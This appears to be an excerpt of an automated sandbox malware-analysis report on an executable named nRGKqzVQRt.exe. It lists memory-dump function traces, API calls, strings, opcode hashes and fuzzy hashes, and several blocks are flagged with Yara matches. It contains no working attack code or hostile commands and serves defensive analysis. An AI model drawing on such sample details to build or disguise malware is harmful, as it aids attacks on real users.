                                                  • _free.LIBCMT ref: 1000C677
                                                  • _free.LIBCMT ref: 1000C682
                                                  • _free.LIBCMT ref: 1000C68D
                                                  • _free.LIBCMT ref: 1000C698
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                                  • Instruction ID: 1780f257e170a803287b818d598211b5e25d48ac92953e35ea001cf34306b7c8
                                                  • Opcode Fuzzy Hash: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                                  • Instruction Fuzzy Hash: 25115479940B08AAF520EB70CC47FCF7B9CEF457C1F400819B29D76097DA75B6484AA1
                                                  APIs
                                                    • Part of subcall function 006800B8: _free.LIBCMT ref: 006800DD
                                                  • _free.LIBCMT ref: 006803BA
                                                    • Part of subcall function 0067994F: HeapFree.KERNEL32(00000000,00000000,?,006800E2,?,00000000,?,?,?,00680385,?,00000007,?,?,00680878,?), ref: 00679965
                                                    • Part of subcall function 0067994F: GetLastError.KERNEL32(?,?,006800E2,?,00000000,?,?,?,00680385,?,00000007,?,?,00680878,?,?), ref: 00679977
                                                  • _free.LIBCMT ref: 006803C5
                                                  • _free.LIBCMT ref: 006803D0
                                                  • _free.LIBCMT ref: 00680424
                                                  • _free.LIBCMT ref: 0068042F
                                                  • _free.LIBCMT ref: 0068043A
                                                  • _free.LIBCMT ref: 00680445
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 800aa5c3ccae66d18581fa224c31917642b9d86138236abd6320ecb2878ee498
                                                  • Instruction ID: 2afb78da0a5068607fdd79c03332f30897d55f267011058958e581919413109c
                                                  • Opcode Fuzzy Hash: 800aa5c3ccae66d18581fa224c31917642b9d86138236abd6320ecb2878ee498
                                                  • Instruction Fuzzy Hash: DE113A71540B04AAE6E1BBB0CC07FCB77DEAF00700F444D1DB2ADA6162EA65B50D9B66
                                                  APIs
                                                  • GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 004222AF
                                                  • __fassign.LIBCMT ref: 00422494
                                                  • __fassign.LIBCMT ref: 004224B1
                                                  • WriteFile.KERNEL32(?,004244B3,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004224F9
                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00422539
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004225E1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 1735259414-0
                                                  • Opcode ID: a6219b4c7093bb4832425b4a6c8eb892de67332f9088a6a6d1728d394167633a
                                                  • Instruction ID: 6b3e8d957b2b9e0b50a2a91a03589f5d996cc43ffc5c7e42b55ca35f77437dd4
                                                  • Opcode Fuzzy Hash: a6219b4c7093bb4832425b4a6c8eb892de67332f9088a6a6d1728d394167633a
                                                  • Instruction Fuzzy Hash: 85C1D071E00268AFCB14CFA8D9909EDFBB5AF08314F68816AE855F7341D6749D42CF58
                                                  APIs
                                                  • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000B720
                                                  • __fassign.LIBCMT ref: 1000B905
                                                  • __fassign.LIBCMT ref: 1000B922
                                                  • WriteFile.KERNEL32(?,10009A1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B96A
                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000B9AA
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000BA52
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 1735259414-0
                                                  • Opcode ID: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                                  • Instruction ID: 817bf58f8fa712ded97291eda06853010b29bdec4c6be72b636a35a8a914ce65
                                                  • Opcode Fuzzy Hash: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                                  • Instruction Fuzzy Hash: 9DC1CF75D006989FEB11CFE8C8809EDBBB5EF09354F28816AE855F7245D631AE42CB60
                                                  APIs
                                                  • GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 00682516
                                                  • __fassign.LIBCMT ref: 006826FB
                                                  • __fassign.LIBCMT ref: 00682718
                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00682760
                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 006827A0
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00682848
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 1735259414-0
                                                  • Opcode ID: 91191ee0e147da6a94128d3f7330e71c7d2df2151abf819d712ae4673ed49efa
                                                  • Instruction ID: 2bb65f15e7ffdab9006c12e2231e8cf64a67503e77af313c70320869bcb65879
                                                  • Opcode Fuzzy Hash: 91191ee0e147da6a94128d3f7330e71c7d2df2151abf819d712ae4673ed49efa
                                                  • Instruction Fuzzy Hash: AAC1ABB5D002598FCF15DFA8C8909EDFBB6EF48314F28426EE855BB341D630A946CB64
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0066CE49
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0066CEB4
                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0066CED1
                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0066CF10
                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0066CF6F
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0066CF92
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiStringWide
                                                  • String ID:
                                                  • API String ID: 2829165498-0
                                                  • Opcode ID: 280e6a93f0dbf58af7c1136f8a33f3405dc4919f95456337fc1b616f5409793b
                                                  • Instruction ID: 61bd49023f5a14af9fb1cfbd7f05b99fb6f3c9ca521307754d53dabc2faed41a
                                                  • Opcode Fuzzy Hash: 280e6a93f0dbf58af7c1136f8a33f3405dc4919f95456337fc1b616f5409793b
                                                  • Instruction Fuzzy Hash: 5851BE72A00A1AAFEB205FA0CC41FFABBBBEF44760F158429F955D6250DB718D10DB94
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,0040FCDB,0040E35F,0040D999), ref: 0040FCF2
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040FD00
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040FD19
                                                  • SetLastError.KERNEL32(00000000,0040FCDB,0040E35F,0040D999), ref: 0040FD6B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 680a329933b96cb53ae5c265fb9cc4498949d1d82d710ca85a3e381c7e918393
                                                  • Instruction ID: d2200d1a55058c355170767e85ccfcbc04d90dd67b8a9ae15d7249d72c620bb9
                                                  • Opcode Fuzzy Hash: 680a329933b96cb53ae5c265fb9cc4498949d1d82d710ca85a3e381c7e918393
                                                  • Instruction Fuzzy Hash: 6201283224D31D5EE63826756C4659B2A54EF11775730023FF411751E2EF7D0C8A554C
                                                  APIs
                                                  • GetLastError.KERNEL32(00000001,?,10003C01,10002DB0,100027A7,?,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8), ref: 10003E08
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003E16
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003E2F
                                                  • SetLastError.KERNEL32(00000000,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8,?,00000001,?), ref: 10003E81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                  • Instruction ID: cea4d4d1ab0609a38d25ccf127c64f3389598815618148a6298b3cccc824aafb
                                                  • Opcode Fuzzy Hash: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                  • Instruction Fuzzy Hash: 610124379083A66EF25BC7B49CC964B379AEB0D3F53208329F114410F8EFA29E45A244
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,0066FF42,0066E5C6,0066DC00), ref: 0066FF59
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0066FF67
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0066FF80
                                                  • SetLastError.KERNEL32(00000000,0066FF42,0066E5C6,0066DC00), ref: 0066FFD2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 680a329933b96cb53ae5c265fb9cc4498949d1d82d710ca85a3e381c7e918393
                                                  • Instruction ID: 9e9f53fbad7611e7eb02fbb4108496f5f10a549a6257b920d0db9e474e7e80c2
                                                  • Opcode Fuzzy Hash: 680a329933b96cb53ae5c265fb9cc4498949d1d82d710ca85a3e381c7e918393
                                                  • Instruction Fuzzy Hash: 6101473220D3216FAB792778BC856AB2767DB03379330837EF2149A1E1EF214C01960C
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free_strpbrk
                                                  • String ID: *?
                                                  • API String ID: 3300345361-2564092906
                                                  • Opcode ID: 1b872839572ce77f52e9475ec3f8f690db5289a5917ecebeda3a0b257d06265e
                                                  • Instruction ID: a122fd9419f898384cf6ba0be5aad0ec39547800dab320595ce715f55366b062
                                                  • Opcode Fuzzy Hash: 1b872839572ce77f52e9475ec3f8f690db5289a5917ecebeda3a0b257d06265e
                                                  • Instruction Fuzzy Hash: BB612E75E002199FDB14CFAAC8815EEFBF5EF48314B14816AEC55E7301D739AE818B94
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free_strpbrk
                                                  • String ID: *?
                                                  • API String ID: 3300345361-2564092906
                                                  • Opcode ID: 60f525a42f190a9458013c37ea75fb8dcfa5ef6644f2c9b3e2bdf0b858d844a1
                                                  • Instruction ID: 65f7a6ace0824e042eecc5f0223ce986bf465cfd8f0d72c987a1f9a07f2c3c62
                                                  • Opcode Fuzzy Hash: 60f525a42f190a9458013c37ea75fb8dcfa5ef6644f2c9b3e2bdf0b858d844a1
                                                  • Instruction Fuzzy Hash: A46150B5D002199FDF15DFA8C8815EDFBF6EF5C714B2481AAE819E7300E6329E458B90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8kv$C:\Users\user\Desktop\nRGKqzVQRt.exe$h'u
                                                  • API String ID: 0-1048751024
                                                  • Opcode ID: 255b861c4cde4eb3723fb2a95b0f68a5a29e851743693505edb5e3ee1a8514b8
                                                  • Instruction ID: ae20e1325de7d9b0d380bebdbbbe849bcc95121cf4aa11dd91f3eee9ce026df2
                                                  • Opcode Fuzzy Hash: 255b861c4cde4eb3723fb2a95b0f68a5a29e851743693505edb5e3ee1a8514b8
                                                  • Instruction Fuzzy Hash: D141BFB0A01219AFDB11EF9ACC819EFBBB8EF85714B11006BF414A7251D778DA81C768
                                                  Strings
                                                  • C:\Users\user\Desktop\nRGKqzVQRt.exe, xrefs: 1000833B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                  • API String ID: 0-3354497341
                                                  • Opcode ID: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                                  • Instruction ID: d1df9cd49d1a9d965a935ddcfcfd3b9185eaf4079d6f623355f3cc1fa6217373
                                                  • Opcode Fuzzy Hash: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                                  • Instruction Fuzzy Hash: C821D075A00206BFF710DF61CC8090B779CFF846E47108124FA949215AEB31EF0087A0
                                                  Strings
                                                  • C:\Users\user\Desktop\nRGKqzVQRt.exe, xrefs: 0067EA6F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                  • API String ID: 0-3354497341
                                                  • Opcode ID: 942b44d07ceeb41c0be3006577560e2bad2008f0503f87ddf01a6426efce1dc8
                                                  • Instruction ID: d94908c07f4da3b96922f13ad9a1d6686f5819b6f88a75583043d807ba7303aa
                                                  • Opcode Fuzzy Hash: 942b44d07ceeb41c0be3006577560e2bad2008f0503f87ddf01a6426efce1dc8
                                                  • Instruction Fuzzy Hash: FC21D071600209AFDB20AB75CD81D6B7BAFEF183A4710C168F81D97240EB22EC058BA4
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __calloc_crt
                                                  • String ID: `CE$pCE$EE
                                                  • API String ID: 3494438863-3553073440
                                                  • Opcode ID: 844dbb072adfe617962027c8ad5edc2c1b3f1fee32c52c54c4b45924023f41de
                                                  • Instruction ID: 246a86268ff65e66e8bbb18e1ca13ba6470a59856a14270decd01848c5431892
                                                  • Opcode Fuzzy Hash: 844dbb072adfe617962027c8ad5edc2c1b3f1fee32c52c54c4b45924023f41de
                                                  • Instruction Fuzzy Hash: F9110A713096116BF7248F1DBC5176622D1FB84B2AB55013BF511CB3E5FBB8C982868D
                                                  APIs
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00410E48,?,?,00438470,00000000,?,00410F73,00000004,InitializeCriticalSectionEx,00429B9C,InitializeCriticalSectionEx,00000000), ref: 00410E17
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID: api-ms-
                                                  • API String ID: 3664257935-2084034818
                                                  • Opcode ID: b02907538fd99b55170e1f1008d4e2625caf0628eb1d99c908a259ed80e5b8af
                                                  • Instruction ID: f93bafddc2c6944db94e1caf77ca7fb938f0b13048c967e4936ca7b24af3ac9f
                                                  • Opcode Fuzzy Hash: b02907538fd99b55170e1f1008d4e2625caf0628eb1d99c908a259ed80e5b8af
                                                  • Instruction Fuzzy Hash: 9611E331B41321ABCB325B69AC01B9E73A4AF02760F150526E901E7380DBB8FDC286DD
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00414CC6,?,?,00414C8E,00000000,7622DF80,?), ref: 00414CE6
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00414CF9
                                                  • FreeLibrary.KERNEL32(00000000,?,?,00414CC6,?,?,00414C8E,00000000,7622DF80,?), ref: 00414D1C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 3717617a3a4dd42a780df557cb31e783c1a43f24c868797946e740d6e1b0b732
                                                  • Instruction ID: e2be2c7a9067ee3b760dcd4954630d509753a7993c03b47d75f7a554283c4f72
                                                  • Opcode Fuzzy Hash: 3717617a3a4dd42a780df557cb31e783c1a43f24c868797946e740d6e1b0b732
                                                  • Instruction Fuzzy Hash: D6F08230601119FBDB219B51ED09BEE7B68EB40752F604065F900A12A0CF788E11DA98
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FBF
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10005FD2
                                                  • FreeLibrary.KERNEL32(00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FF5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                  • Instruction ID: ce5d81a5a20928f213bfffb098e7a6005668583a74e8757c7f390ca8b74bdc84
                                                  • Opcode Fuzzy Hash: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                  • Instruction Fuzzy Hash: 1BF01C31904129FBEB06DB91CD0ABEE7AB9EB047D6F1041B4F501A21A4CBB5CE41DB90
                                                  APIs
                                                  • _free.LIBCMT ref: 0041702C
                                                    • Part of subcall function 004196E8: RtlFreeHeap.NTDLL(00000000,00000000,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?), ref: 004196FE
                                                    • Part of subcall function 004196E8: GetLastError.KERNEL32(?,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?,?), ref: 00419710
                                                  • _free.LIBCMT ref: 0041703F
                                                  • _free.LIBCMT ref: 00417050
                                                  • _free.LIBCMT ref: 00417061
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID: 8kv
                                                  • API String ID: 776569668-3931507551
                                                  • Opcode ID: 30cbf7fb3445322f5385668cae4fba4876bf89921f2c2bac2e7e205206153011
                                                  • Instruction ID: 3fe777f1b78a63b08a2ef341b4c74d1d5c6aa3709f5bbb988e12ac5a6b696405
                                                  • Opcode Fuzzy Hash: 30cbf7fb3445322f5385668cae4fba4876bf89921f2c2bac2e7e205206153011
                                                  • Instruction Fuzzy Hash: 15E0B6B1901322AF8602BF1ABC114CAFA21AB54734301602FF40012A31CF3D19929F9E
                                                  APIs
                                                    • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,7622DF80,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418E28
                                                    • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418EC6
                                                  • _free.LIBCMT ref: 004184A7
                                                  • _free.LIBCMT ref: 004184C0
                                                  • _free.LIBCMT ref: 004184FE
                                                  • _free.LIBCMT ref: 00418507
                                                  • _free.LIBCMT ref: 00418513
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3291180501-0
                                                  • Opcode ID: 5c7b43d89d65a39910ed5fd65db01eea952a882e3af708f59d2cf6b7f1454f4d
                                                  • Instruction ID: 9616d8a6246681855122babaf8440f4712779bb404b18624a61a89f01e96d866
                                                  • Opcode Fuzzy Hash: 5c7b43d89d65a39910ed5fd65db01eea952a882e3af708f59d2cf6b7f1454f4d
                                                  • Instruction Fuzzy Hash: 69B14975A0161A9BDB24DF15C884AEEB3B5FB08304F5445AEE849A7350EB34AED0CF48
                                                  APIs
                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,1000A899,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 1000A680
                                                  • __alloca_probe_16.LIBCMT ref: 1000A736
                                                  • __alloca_probe_16.LIBCMT ref: 1000A7CC
                                                  • __freea.LIBCMT ref: 1000A837
                                                  • __freea.LIBCMT ref: 1000A843
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __alloca_probe_16__freea$Info
                                                  • String ID:
                                                  • API String ID: 2330168043-0
                                                  • Opcode ID: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
                                                  • Instruction ID: 1dd90d70d9504398cfa9d6ef4ea6864651e072268de8b4bf5549d7cf43e308ef
                                                  • Opcode Fuzzy Hash: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
                                                  • Instruction Fuzzy Hash: C081A472D042569BFF11CE648C81ADE7BF5EF0B6D0F158265E904AB148DB369DC1CBA0
                                                  APIs
                                                  • __alloca_probe_16.LIBCMT ref: 1000B03B
                                                  • __alloca_probe_16.LIBCMT ref: 1000B101
                                                  • __freea.LIBCMT ref: 1000B16D
                                                    • Part of subcall function 100079EE: RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                  • __freea.LIBCMT ref: 1000B176
                                                  • __freea.LIBCMT ref: 1000B199
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
